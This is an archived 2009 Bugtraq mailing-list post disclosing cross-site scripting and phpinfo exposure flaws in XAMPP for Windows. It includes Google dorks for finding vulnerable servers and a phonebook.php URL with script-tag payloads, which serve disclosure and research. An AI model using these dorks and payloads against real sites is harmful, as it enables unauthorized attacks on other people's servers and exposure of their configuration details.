[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
XAMPP for Windows (Xss/PHPinfo) Multiple Vulnerability
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: XAMPP for Windows (Xss/PHPinfo) Multiple Vulnerability
- From: "Cru3l.b0y" <cru3l.b0y@xxxxxxxxx>
- Date: Tue, 30 Jun 2009 18:51:52 +0330
Hi Dear,
I found new bug.please publish it.exploit attached to mail.
Best Regards.
# XAMPP for Windows (Xss/PHPinfo) Multiple Vulnerability
# AUTHOR : Cru3l.b0y
# DATE : 05 APR 2009
# SITE : WwW.DeltaHacking.Net
# CONTACT : Cru3l.b0y@xxxxxxxxxxxxxxxx
#####################################################
# APPLICATION : XAMPP for Windows
# VERSION : 1.4.9 , 1.5.0 , 1.5.1 , 1.6.4
# DOWNLO : http://www.apachefriends.org/en/xampp-windows.html
# VENDOR : http://www.apachefriends.org/
#####################################################
[+] Xss:
Dork : inurl:"/xampp/phonebook.php"
Exploit :
Vulnerability is in phonebook. First go to
site.com/xampp/phonebook.php
now write your script in First name or Phone number box
and press ADD. Your script will run successfully.
http://127.0.0.1/xampp/phonebook.php?lastname=Cru3l.b0y&firstname=<script>alert(123);</script>&phone=<script>alert(123);</script>
[+] PHPinfo:
Dork : inurl:"/xampp/phpinfo.php"
Exploit : http://127.0.0.1/xampp/phpinfo.php
##############################################################################################
# Greeting: Dr.Trojan, Sasha, b3hz4d, PLATEN, black.viper and all member in
DeltaHacking.Net #
##############################################################################################